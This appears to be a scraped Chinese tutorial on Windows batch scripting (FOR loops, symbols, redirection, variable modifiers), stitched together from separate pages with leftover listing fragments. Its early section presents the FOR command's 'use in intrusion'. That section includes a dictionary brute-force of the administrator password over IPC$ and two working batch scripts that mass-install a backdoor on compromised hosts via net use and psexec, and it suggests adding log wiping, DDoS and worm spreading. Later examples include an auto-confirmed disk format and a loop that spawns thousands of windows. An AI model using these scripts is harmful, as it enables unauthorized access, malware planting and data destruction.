    skip=n - 指在檔开始时忽略的行数。

    delims=xxx - 指分隔符集。这个替换了空格和跳格键的

    默认分隔符集。

    tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代

    的 for 本身。这会导致额外变量名称的

    格式为一个范围。通过 nth 符号指定 m

    符号字符串中的最后一个字符星号,

    那么额外的变量将在最后一个符号解析之

    分配并接受行的保留文本。

    usebackq - 指定新语法已在下类情况中使用:

    在作为命令执行一个后引号的字符串并且

    引号字符为文字字符串命令并允许在 fi

    中使用双引号扩起文件名称。

     

    sample1:

    FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

     

    会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将

    每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或

    空格定界符号。请注意,这个 for 程序体的语句引用 %i 来

    取得第二个符号,引用 %j 来取得第三个符号,引用 %k

    来取得第三个符号后的所有剩余符号。对于带有空格的文件

    名,您需要用双引号将文件名括起来。为了用这种方式来使

    用双引号,您还需要使用 usebackq 选项,否则,双引号会

    被理解成是用作定义某个要分析的字符串的。

     

    %i 专门在 for 语句中得到说明,%j 和 %k 是通过

    tokens= 选项专门得到说明的。您可以通过 tokens= 一行

    指定最多 26 个符号,只要不试图说明一个高于字母 z 或

    Z 的变数。请记住,FOR 变量是单一字母、分大小写和全局的;

    同时不能有 52 个以上都在使用中。

     

    您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,

    用单引号将括号之间的 filenameset 括起来。这样,该字符

    串会被当作一个檔中的一个单一输入行。

     

    最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将

    括号之间的 filenameset 变成一个反括字符串。该字符串会

    被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进

    内存,并被当作文件分析。因此,以下例子:

     

    FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

     

    会枚举当前环境中的环境变量名称。

     

    另外,FOR 变量参照的替换已被增强。您现在可以使用下列

    选项语法:

     

    ~I - 删除任何引号("),扩充 %I

    %~fI - 将 %I 扩充到一个完全合格的路径名

    %~dI - 仅将 %I 扩充到一个驱动器号

    %~pI - 仅将 %I 扩充到一个路径

    %~nI - 仅将 %I 扩充到一个文件名

    %~xI - 仅将 %I 扩充到一个檔扩展名

    %~sI - 扩充的路径只含有短名

    %~aI - 将 %I 扩充到文件的文件属性

    %~tI - 将 %I 扩充到檔的日期/时间

    %~zI - 将 %I 扩充到文件的大小

    %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充

    到找到的第一个完全合格的名称。如果环境变量

    未被定义,或者没有找到文件,此组合键会扩充

    空字符串

     

    可以组合修饰符来得到多重结果:

     

    %~dpI - 仅将 %I 扩充到一个驱动器号和路径

    %~nxI - 仅将 %I 扩充到一个文件名和扩展名

    %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名

    %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充

    到找到的第一个驱动器号和路径。

    %~ftzaI - 将 %I 扩充到类似输出线路的 DIR

     

    在以上例子中,%I 和 PATH 可用其它有效数值代替。%~ 语法

    用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名

    比较易读,而且避免与不分大小写的组合键混淆。

     

    以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。

     

    sample2:

     

    利用For命令来实现对一台目标Win2k主机的暴力密码破解。

    我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。

    最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"

    用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--

    for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。

     

    sample3:

     

    你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。

     

    主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)

    @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k

    tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。

    而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的檔。

    delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。

    代码雏形:-+

     

    --------------- cut here then save as a batchfile(I call it main.bat ) --------------------

    @echo off

    @if "%1"=="" goto usage

    @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k

    @goto end

    :usage

    @echo run this batch in dos modle.or just double-click it.

    :end

    --------------- cut here then save as a batchfile(I call it main.bat ) --------------------

     

    ------------------- cut here then save as a batchfile(I call it door.bat) -----------------

    @net use \\%1\ipc$ %3 /u:"%2"

    @if errorlevel 1 goto failed

    @echo Trying to establish the IPC$ connection …………OK

    @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt

    @p***ec \\%1 c:\winnt\system32\windrv32.exe

    @p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt

    :failed

    @echo Sorry can not connected to the victim.

    ----------------- cut here then save as a batchfile(I call it door.bat) -------------------

    这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容

    尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

     

    展开全文
  • bat批处理命令大全

    2017-04-17 21:05:12
    bat批处理命令大全
  • BAT批处理命令

    千次阅读 2021-10-24 15:11:13
    1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。 2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环。 3....

    基础语法

    1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。 
    2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环。 
    3.批处理的编程能力远不如C语言等编程语言,也十分不规范。 
    4.每个编写好的批处理文件都相当于一个DOS的外部命令,把它所在的目录放到DOS搜索路径(path)中,即可在任意位置运行。 
    5.C:\AUTOEXEC.BAT 是每次系统启动时都会自动运行的,可以将每次启动时都要运行的命令放入该文件中。 
    6.大小写不敏感(命令符忽略大小写) 
    7.批处理的文件扩展名为 .bat 或 .cmd。 
    8.在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe来运行该文件。
    

    符号说明

    1、@  命令行回显屏蔽符
    2、%  批处理变量引导符
    3、>   重定向符
    4、>>  重定向符
    5、<、>&、<& 重定向符
    6、|  命令管道符
    7、^  转义字符
    8、&  组合命令
    9、&& 组合命令
    10、||  组合命令
    11、""  字符串界定符
    12、, 逗号
    13、; 分号
    14、() 括号
    15、! 感叹号
    16、批处理中可能会见到的其它特殊标记符: (略)
            CR(0D) 命令行结束符 
            Escape(1B) ANSI转义字符引导符 
            Space(20) 常用的参数界定符 
            Tab(09) ; = 不常用的参数界定符 
            + COPY命令文件连接符 
            * ? 文件通配符 
            / 参数开关引导符 
            : 批处理标签引导符 
    
    1、@  命令行回显屏蔽符
     
    
    这个字符在批处理中的意思是关闭当前行的回显。
    ECHO OFF可以关闭掉整个批处理命令的回显,但不能关掉ECHO OFF这个命令,现在我们在ECHO OFF这个命令前加个@,就可以达到所有命令均不回显的要求
    
    2、%  批处理变量引导符
    这个百分号严格来说是算不上命令的,它只是批处理中的参数而已(多个%一起使用的情况除外,以后还将详细介绍)。
    引用变量用%var%,调用程序外部参数用%1至%9等等
    %0  %1  %2  %3  %4  %5  %6  %7  %8  %9  %*为命令行传递给批处理的参数
    %0 批处理文件本身,包括完整的路径和扩展名
    %1 第一个参数
    %9 第九个参数
    %* 从第一个参数开始的所有参数
    参数%0具有特殊的功能,可以调用批处理自身,以达到批处理本身循环的目的,也可以复制文件自身等等。
    例:最简单的复制文件自身的方法
    copy %0 d:\wind.bat
    小技巧:添加行内注释
    %注释内容%(可以用作行内注释,不能出现重定向符号和管道符号)
    为什么这样呢?此时“注释内容”其实被当作变量,其值是空的,故只起注释作用,不过这种用法容易出现语法错误,一般不用。
    
    3、>   重定向符
    输出重定向命令
    DOS的标准输入输出通常是在标准设备键盘和显示器上进行的,利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中: 
    1.大于号“>”将命令发送到文件或设备,例如打印机>prn。使用大于号“>”时,有些命令输出(例如错误消息)不能重定向。
    2.双大于号“>>”将命令输出添加到文件结尾而不删除文件中已有的信息。
    3.小于号“<”从文件而不是键盘上获取命令所需的输入。
    4.>&符号将输出从一个默认I/O流(stdout,stdin,stderr)重新定向到另一个默认I/O流。
    例如,command >output_file 2>&1将处理command过程中的所有错误信息从屏幕重定向到标准文件输出中。标准输出的数值如下所示:
    命令重定向的标准句柄
    
    
    
    这个字符的意思是传递并且覆盖,他所起的作用是将运行的结果传递到后面的范围(后边可以是文件,也可以是默认的系统控制台)
    在NT系列命令行中,重定向的作用范围由整个命令行转变为单个命令语句,受到了命令分隔符&,&&,||和语句块的制约限制。
    比如:
    使用命令:echo hello >1.txt将建立文件1.txt,内容为”hello “(注意行尾有一空格)
    使用命令:echo hello>1.txt将建立文件1.txt,内容为”hello“(注意行尾没有空格)
    
    4、>>  重定向符
    输出重定向命令
    这个符号的作用和>有点类似,但他们的区别是>>是传递并在文件的末尾追加,而>是覆盖
    用法同上
    同样拿1.txt做例子
    使用命令:
    echo hello > 1.txt
    echo world >>1.txt
    这时候1.txt 内容如下:
    hello
    world
    
    5、<、>&、<& 重定向符
    这三个命令也是管道命令,但它们一般不常用,你只需要知道一下就ok了,当然如果想仔细研究的话,可以自己查一下资料。(本人已查过,网上也查不到相关资料)
    <,输入重定向命令,从文件中读入命令输入,而不是从键盘中读入。
    @echo off
    echo 2005-05-01>temp.txt
    date <temp.txt
    del temp.txt
    这样就可以不等待输入直接修改当前日期
    >&,将一个句柄的输出写入到另一个句柄的输入中。
    <&,刚好和>&相反,从一个句柄读取输入并将其写入到另一个句柄输出中。
    常用句柄:0、1、2,未定义句柄:3—9
    1>nul 表示禁止输出正确的信息
    2>nul 表示禁止输出错误信息。
    其中的1与2都是代表某个数据流输入输出的地址(NT CMD 称之为句柄,MSDOS称之为设备)。
    句柄0:标准输入stdin,键盘输入
    句柄1:标准输出stdout,输出到命令提示符窗口(console,代码为CON)
    句柄2:标准错误stderr,输出到命令提示符窗口(console,代码为CON)
    其中的stdin可被<重定向,stdout可被>、>>重定向。
    我们已经知道读取文本中的内容可以用for命令,但如果只需要读取第一行用for命令就有点麻烦。简单的办法如下:
    @echo off
    set /p str=<%0
    echo %str%
    pause
    运行显示批处理文件自身的第一行:@echo off
    
    6、|  命令管道符
    格式:第一条命令 | 第二条命令 [| 第三条命令...]
    将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
    例如:
    dir c:\|find "txt"
    以上命令是:查找C:\所有,并发现TXT字符串。
    FIND的功能请用 FIND /? 自行查看
    在不使format的自动格式化参数时,我是这样来自动格式化A盘的
    echo y|format a: /s /q /v:system
    用过format的都知道,再格盘时要输入y来确认是否格盘,这个命令前加上echo y并用|字符来将echo y的结果传给format命令
    从而达到自动输入y的目的
    (这条命令有危害性,测试时请慎重)
    
    7、^  转义字符
    ^是对特殊符号<,>,&的前导字符,在命令中他将以上3个符号的特殊功能去掉,仅仅只把他们当成符号而不使用他们的特殊意义。
    比如
    echo test ^>1.txt
    结果则是:test > 1.txt
    他没有追加在1.txt里,呵呵。只是显示了出来
    另外,此转义字符还可以用作续行符号。
    举个简单的例子:
    @echo off
    echo 英雄^
    是^
    好^
    男人
    pause
    不用多说,自己试一下就明白了。
    为什么转义字符放在行尾可以起到续行符的作用呢?原因很简单,因为每行末尾还有一个看不见的符号,即回车符,转义字符位于行尾时就让回车符失效了,从而起到了续行的作用。
    
    8、& 组合命令
    语法:第一条命令 & 第二条命令 [& 第三条命令...]
    &、&&、||为组合命令,顾名思义,就是可以把多个命令组合起来当一个命令来执行。这在批处理脚本里是允许的,而且用的非常广泛。因为批处理认行不认命令数目。
    这个符号允许在一行中使用2个以上不同的命令,当第一个命令执行失败了,也不影响后边的命令执行。
    这里&两边的命令是顺序执行的,从前往后执行。
    比如:
    dir z:\ & dir y:\ & dir c:\
    以上命令会连续显示z,y,c盘的内容,不理会该盘是否存在
    
    9、&& 组合命令
    语法:第一条命令 && 第二条命令 [&& 第三条命令...]
    用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令
    这个命令和上边的类似,但区别是,第一个命令失败时,后边的命令也不会执行
    dir z:\ && dir y:\ && dir c:\
    
    10、||  组合命令
    语法:第一条命令 || 第二条命令 [|| 第三条命令...]
    用这种方法可以同时执行多条命令,当一条命令失败后才执行第二条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
    提示:组合命令和重定向命令一起使用必须注意优先级
    管道命令的优先级高于重定向命令,重定向命令的优先级高于组合命令
    问题:把C盘和D盘的文件和文件夹列出到a.txt文件中。看例:
    dir c:\ && dir d:\ > a.txt
    这 样执行后a.txt里只有D盘的信息!为什么?因为组合命令的优先级没有重定向命令的优先级高!所以这句在执行时将本行分成这两部分:dir c:\和dir d:\ > a.txt,而并不是如你想的这两部分:dir c:\ && dir d:\和> a.txt。要使用组合命令&&达到题目的要求,必须得这么写:
    dir c:\ > a.txt && dir d:\ >> a.txt
    这样,依据优先级高低,DOS将把这句话分成以下两部分:dir c:\ > a.txt和dir d:\ >> a.txt。例十八中的几句的差别比较特殊,值得好好研究体会一下。
    当然这里还可以利用&命令(自己想一下道理哦):
    dir c:\ > a.txt & dir d:\ >> a.txt
    [这个也可以用 dir c:\;d:\ >>a.txt 来实现]
    
    11、""  字符串界定符
    双引号允许在字符串中包含空格,进入一个特殊目录可以用如下方法
    cd "program files"
    cd progra~1
    cd pro*
    以上三种方法都可以进入program files这个目录
    
    12、, 逗号
    逗号相当于空格,在某些情况下“,”可以用来当做空格使
    比如
    dir,c:\
    
    13、; 分号
    分号,当命令相同时,可以将不同目标用;来隔离,但执行效果不变,如执行过程中发生错误,则只返回错误报告,但程序仍会执行。(有人说不会继续执行,其实测试一下就知道了,只不过它的执行有个规则,请看下面的规则)
    比如:
    dir c:\;d:\;e:\;z:\
    以上命令相当于
    dir c:\
    dir d:\
    dir e:\
    dir f:\
    如果其中z盘不存在,运行显示:系统找不到指定的路径。然后终止命令的执行。
    例:dir c:\;d:\;e:\1.txt
    以上命令相当于
    dir c:\
    dir d:\
    dir e:\1.txt
    其中文件e:\1.txt不存在,但e盘存在,有错误提示,但命令仍会执行。
    规则:(我是在操作系统是XP SP3,英文版下测试的)
    1.如果目标路径不存在,则整个语句都不执行,例如dir c:\;c:\dfdfdf\a.txt,则根本不会执行,因为我没有c:\dfdfdf\这个目录;
    2.如果路径存在,仅文件不存在,则会继续执行,并且提示文件不存在的错误,例如:dir c:\;c:\temp\a.txt,我的目录中有c:\temp\文件夹,但这个目录下面没有1.txt这个文件。
    
    14、() 括号
    小括号在批处理编程中有特殊的作用,左右括号必须成对使用,括号中可以包括多行命令,这些命令将被看成一个整体,视为一条命令行。
        括号在for语句和if语句中常见,用来嵌套使用循环或条件语句,其实括号()也可以单独使用,请看例子。
    例:
    命令:echo 1 & echo 2 & echo 3
    可以写成:
    (
    echo 1
    echo 2
    echo 3
    )
    上面两种写法效果一样,这两种写法都被视为是一条命令行。
    注意:这种多条命令被视为一条命令行时,如果其中有变量,就涉及到变量延迟的问题。
    
    15、! 感叹号
    没啥说的,在变量延迟问题中,用来表示变量,即%var%应该表示为!var!,请看前面的setlocal命令介绍。
    
    三、DOS循环:for命令详解
    如果你有什么命令不懂,直接在CMD下面输入:
    name /? 这样的格式来看系统给出的帮助文件,比如for /? 就会把FOR命令的帮助全部显示出来!
    
    1,基本格式
    FOR %%variable IN (set) DO command [command-parameters]
      %%variable  指定一个单一字母表示可替换的参数。
      (set)      指定一个或一组文件。可以使用通配符。
      command    指定对每个文件执行的命令。
      command-parameters 为特定命令指定参数或命令行开关。
    
    在批处理程序中使用 FOR 命令时,指定变量请使用 %%variable
    而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I
    
    参数:FOR有4个参数 /d   /l   /r   /f   他们的作用我在下面用例子解释
    
     2,参数 /d
    FOR /D %%variable IN (set) DO command [command-parameters]
    含义:如果集中包含通配符,则指定与目录名匹配,而不与文件名匹配。
    如果 Set (也就是我上面写的 "相关文件或命令") 包含通配符(* 和 ?),将对与 Set 相匹配的每个目录(而不是指定目录中的文件组)执行指定的 Command。
    这个参数主要用于目录搜索,不会搜索文件,看这样的例子:
    
    @echo off
    for /d %%i in (c:\*) do echo %%i
    pause
    运行会把C盘根目录下的全部目录名字打印出来,而文件名字一个也不显示!
    在来一个,比如我们要把当前路径下文件夹的名字只有1-3个字母的打出来:
    
    @echo off
    for /d %%i in (???) do echo %%i
    pause
    这样的话如果你当前目录下有目录名字只有1-3个字母的,就会显示出来,没有就不显示了
    这里解释下*号和?号的作用,*号表示任意N个字符,而?号只表示任意一个字符
    知道作用了,给大家个思考题目:
    
    @echo off
    for /d %%i in (window?) do echo %%i
    pause
    保存到C盘下执行,会显示什么呢?自己看吧! 显示:windows
    /D参数只能显示当前目录下的目录名字,这个大家要注意!
    
    3,参数 /R
    FOR /R [[drive:]path] %%variable IN (set) DO command [command-parameters]
    含义:检查以 [drive:]path 为根的目录树,指向每个目录中的FOR 语句。如果在 /R 后没有指定目录,则使用当前目录。如果集仅为一个单点(.)字符,则枚举该目录树。
    递归
    上面我们知道,/D只能显示当前路径下的目录名字,那么现在这个/R也是和目录有关,他能干嘛呢?放心他比/D强大多了!
    他可以把当前或者你指定路径下的文件名字全部读取,注意是文件名字,有什么用看例子!
    注意2点:
        1、set中的文件名如果含有通配符(?或*),则列举/R参数指定的目录及其下面的所用子目录中与set相符合的所有文件,无相符文件的目录则不列举。
        2、相反,如果set中为具体文件名,不含通配符,则枚举该目录树(即列举该目录及其下面的所有子目录),而不管set中的指定文件是否存在。这与前面所说的单点(.)枚举目录树是一个道理,单点代表当前目录,也可视为一个文件。
    例:
    
    @echo off
    for /r c:\ %%i in (*.exe) do echo %%i
    pause
    咱们把这个BAT保存到D盘随便哪里然后执行,我会就会看到,他把C盘根目录,和每个目录的子目录下面全部的EXE文件都列出来了!!!!
    例:
    
    @echo off
    for /r %%i in (*.exe) do @echo %%i
    pause
    运行本例发现枚举了c盘所有目录,为了只列举boot.ini存在的目录,可改成下面这样:
    
    @echo off
    for /r c:\ %%i in (boot.ini) do if exist %%i echo %%i
    pause
    4、参数 /L
    FOR /L %%variable IN (start,step,end) DO command [command-parameters]
    含义:该集表示以增量形式从开始到结束的一个数字序列。因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生序列 (5 4 3 2 1)。
    使用迭代变量设置起始值 (Start#),然后逐步执行一组范围的值,直到该值超过所设置的终止值 (End#)。/L 将通过对 Start# 与 End# 进行比较来执行迭代变量。如果 Start# 小于 End#,就会执行该命令。如果迭代变量超过 End#,则命令解释程序退出此循环。还可以使用负的 Step# 以递减数值的方式逐步执行此范围内的值。例如,(1,1,5) 生成序列 1 2 3 4 5,而 (5,-1,1) 则生成序列 (5 4 3 2 1)。
    例子:
    
    @echo off
    for /l %%i in (1,1,5) do @echo %%i
    pause
    保存执行看效果,他会打印从1 2 3 4 5  这样5个数字
    (1,1,5)这个参数也就是表示从1开始每次加1直到5终止!
    等会晕,就打印个数字有P用...好的满足大家,看这个例子:
    
    @echo off
    for /l %%i in (1,1,5) do start cmd
    pause
    执行后是不是吓了一跳,怎么多了5个CMD窗口,呵呵!如果把那个 (1,1,5)改成 (1,1,65535)会有什么结果,我先告诉大家,会打开65535个CMD窗口....这么多你不死机算你强!
    当然我们也可以把那个start cmd改成md %%i 这样就会建立指定个目录了!!!名字为1-65535
    
    5、参数 /F
    \迭代及文件解析
    使用文件解析来处理命令输出、字符串及文件内容。使用迭代变量定义要检查的内容或字符串,并使用各种options选项进一步修改解析方式。使用options令牌选项指定哪些令牌应该作为迭代变量传递。请注意:在没有使用令牌选项时,/F 将只检查第一个令牌。
    文件解析过程包括读取输出、字符串或文件内容,将其分成独立的文本行以及再将每行解析成零个或更多个令牌。然后通过设置为令牌的迭代变量值,调用 for 循环。默认情况下,/F 传递每个文件每一行的第一个空白分隔符号。跳过空行。
    详细的帮助格式为:
    FOR /F ["options"] %%variable IN (file-set) DO command [command-parameters]
    FOR /F ["options"] %%variable IN ("string") DO command [command-parameters]
    FOR /F ["options"] %%variable IN ('command') DO command [command-parameters]
    含义:带引号的字符串"options"包括一个或多个指定不同解析选项的关键字。这些关键字为:
            eol=c                 - 指一个行注释字符的结尾(就一个)(备注:默认以使用;号为行首字符的为注释行)
            skip=n               - 指在文件开始时忽略的行数,(备注:最小为1,n可以大于文件的总行数,默认为1。)
            delims=xxx        - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
            tokens=x,y,m-n  - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。经测试,该参数最多只能区分31个字段。(备注:默认为1,则表示只显示分割后的第一列的内容,最大是31,超过最大则无法表示)
            usebackq        - 使用后引号(键盘上数字1左面的那个键`)。未使用参数usebackq时:file-set表示文件,但不能含有空格双引号表示字符串,即"string"单引号表示执行命令,即'command'使用参数usebackq时:file-set和"file-set"都表示文件当文件路径或名称中有空格时,就可以用双引号括起来单引号表示字符串,即'string'后引号表示命令执行,即`command`
    
    例子:
    
    @echo off
     
    set pid=8080
    for /f "tokens=2" %%a in ('tasklist ^| find /i "%pid%"') do (
    	if %%a==%pid% (goto f)
    	:f
    	echo 当前运行进程的pid=%pid%
    	taskkill /f /pid %pid%
    	call:startApp
    	exit
    )
    其实这里的tokens就是代步第几列的意思,可以表示区间列tokens=1-5, 也可以表示tokens=3单独列,后面的变量代变当前列的输出,依次后面的列,按照你字母的变量顺序进行输出,大家可以自己试试
    
    For命令例1:
    
    @echo off
    rem 首先建立临时文件test.txt
    echo ;注释行,这是临时文件,用完删除 >test.txt
    echo 11段 12段 13段 14段 15段 16段 >>test.txt
    echo 21段,22段,23段,24段,25段,26段 >>test.txt
    echo 31段-32段-33段-34段-35段-36段 >>test.txt
    FOR /F "eol=; tokens=1,3* delims=,- " %%i in (test.txt) do echo %%i %%j %%k
    Pause
    Del test.txt
    运行显示结果:
    11段 13段 14段 15段 16段
    21段 23段 24段,25段,26段
    31段 33段 34段-35段-36段
    请按任意键继续. . .
    为什么会这样?我来解释:
    eol=;          分号开头的行为注释行
    tokens=1,3*    将每行第1段,第3段和剩余字段分别赋予变量%%i,%%j,%%k
    delims=,-     (减号后有一空格)以逗号减号和空格为分隔符,空格必须放在最后
    
    For命令例2:
    
    @echo off
    FOR /F "eol= delims=" %%i in (test.txt) do echo %%i
    Pause
    For命令例3:
    
    @echo off
    FOR /F "delims=" %%i in ('net user') do @echo %%i
    pause
    四、FOR命令中的变量
    FOR的变量全部列出来:
         ~I             - 删除任何引号("),扩展 %I
         %~fI         - 将 %I 扩展到一个完全合格的路径名
         %~dI        - 仅将 %I 扩展到一个驱动器号
         %~pI        - 仅将 %I 扩展到一个路径
         %~nI        - 仅将 %I 扩展到一个文件名
         %~xI        - 仅将 %I 扩展到一个文件扩展名
         %~sI        - 扩展的路径只含有短名
         %~aI        - 将 %I 扩展到文件的文件属性
         %~tI        - 将 %I 扩展到文件的日期/时间
         %~zI        - 将 %I 扩展到文件的大小
         %~$PATH:I   - 查找列在路径环境变量的目录,并将 %I 扩展到找到的第一个完全合格的名称。如果环境变量名未被定义,或者没有找到文件,此组合键会扩展到空字符串
    
    我们可以看到每行都有一个大写字母"I",这个I其实就是我们在FOR带入的变量,我们FOR语句代入的变量名是什么,这里就写什么.
    比如:FOR /F  %%z IN ('set') DO @echo %%z
    这里我们代入的变量名是z那么我们就要把那个I改成z,例如%~fI改为%~fz
    至于前面的%~p这样的内容就是语法了!
    
    1、 ~I          - 删除任何引号("),扩展 %I
    作用:删除引号
    例子:
    首先建立临时文件temp.txt,内容如下
    
    "1111
    "2222"
    3333"
    "4444"44
    "55"55"55
    @echo off
    echo ^"1111>temp.txt
    echo "2222">>temp.txt
    echo 3333^">>temp.txt
    echo "4444"44>>temp.txt
    echo ^"55"55"55>>temp.txt
    rem 上面建立临时文件,注意不成对的引号要加转义字符^,重定向符号前不要留空格
    FOR /F "delims=" %%i IN (temp.txt) DO echo  %%~i
    pause
    del temp.txt
    执行后,我们看CMD的回显如下:
    1111           #字符串前的引号被删除了
    2222           #字符串首尾的引号都被删除了
    3333"          #字符串前无引号,后面的引号保留
    4444"44        #字符串前面的引号删除了,而中间的引号保留
    55"55"55       #字符串前面的引号删除了,而中间的引号保留
    请按任意键继续. . .
    和之前temp.txt中的内容对比一下,我们会发现第1、2、5行的引号都消失了,这就是删除引号~i的作用了!
    删除引号规则如下(BAT兄补充!)
    1、若字符串首尾同时存在引号,则删除首尾的引号;
    2、若字符串尾不存在引号,则删除字符串首的引号;
    3、如果字符串中间存在引号,或者只在尾部存在引号,则不删除。
    
    2、 %~fI        - 将 %I 扩展到一个完全合格的路径名
    例子:
    把代码保存放在随便哪个地方,我这里就放桌面吧.
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~fi
    pause
    执行后显示内容如下
    C:\Documents and Settings\Administrator\桌面\test.bat
    C:\Documents and Settings\Administrator\桌面\test.vbs
    当我把代码中的 %%~fi直接改成%%i
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%i
    pause
    执行后就会显示以下内容:
    test.bat
    test.vbs
    通过对比,我们很容易就看出没有路径了,这就是"将 %I 扩展到一个完全合格的路径名"的作用
    也就是如果%i变量的内容是一个文件名的话,他就会把这个文件所在的绝对路径打印出来,而不只单单打印一个文件名!
    
    3、 %~dI        - 仅将 %I 扩展到一个驱动器号
    例子:
    代码如下,我还是放到桌面执行!
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~di
    pause
    执行后我CMD里显示如下
    C:
    C:
    我桌面就两个文件test.bat,test.vbs,%%~di作用是,如果变量%%i的内容是一个文件或者目录名,他就会把他这文件
    或者目录所在的盘符号打印出来!
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo %%~pi pause
    我就不打结果了,大家自己复制代码看结果吧,下面几个都是这么个用法,代码给出来,大家自己看结果吧!
    
    5、 %~nI        - 仅将 %I 扩展到一个文件名
    只打印文件名字
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~ni
    pause
    6、 %~xI        - 仅将 %I 扩展到一个文件扩展名
    只打印文件的扩展名
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~xi
    pause
    7、 %~sI        - 扩展的路径只含有短名
    打印绝对短文件名
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~si
    pause
    8、 %~aI        - 将 %I 扩展到文件的文件属性
    打印文件的属性
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~ai
    pause
    9、 %~tI        - 将 %I 扩展到文件的日期/时间
    打印文件建立的日期
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~ti
    pause
    10、 %~zI        - 将 %I 扩展到文件的大小
    打印文件的大小
    
    FOR /F "delims==" %%i IN ('dir /b') DO @echo  %%~zi
    pause
    上面例子中的"delims=="可以改为"delims=",即不要分隔符
    
    11、 %~$PATH:I - 查找列在路径环境变量的目录
    并将 %I 扩展到找到的第一个完全合格的名称。如果环境变量名未被定义,或者没有找到文件,此组合键会扩展到空字符串
    这是最后一个,和上面那些都不一样,我单独说说!
    然后在把这些代码保存为批处理,放在桌面。
    
    @echo off
    FOR /F "delims=" %%i IN (“notepad.exe”) DO echo  %%~$PATH:i
    pause
    龙卷风补充:上面代码显示结果为C:\WINDOWS\system32\notepad.exe
    他的意思就在PATH变量里指定的路径里搜索notepad.exe文件,如果有notepad.exe则会把他所在绝对路径打印出来,没有就打印一个错误!
    

    参数

    系统参数

    %SystemRoot% === C:\WINDOWS (%windir% 同样)
    %ProgramFiles% === C:\Program Files
    %USERPROFILE% === C:\Documents and Settings\Administrator (子目录有“桌面”,“开始菜单”,“收藏夹”等)
    %APPDATA% === C:\Documents and Settings\Administrator\Application Data
    %TEMP% === C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp (%TEM% 同样)
    %APPDATA% === C:\Documents and Settings\Administrator\Application Data
    %OS% === Windows_NT (系统)
    %Path% === %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem (原本的设置)
    %HOMEDRIVE% === C: (系统盘)
    %HOMEPATH% === \Documents and Settings\Administrator
    

    传递参数给批处理文件

    %[1-9]表示参数,参数是指在运行批处理文件时在文件名后加的以空格(或者Tab)分隔的字符串。
    变量可以从%0到%9,%0表示批处理命令本身,其它参数字符串用 %1 到 %9 顺序表示。
    
    Sample:
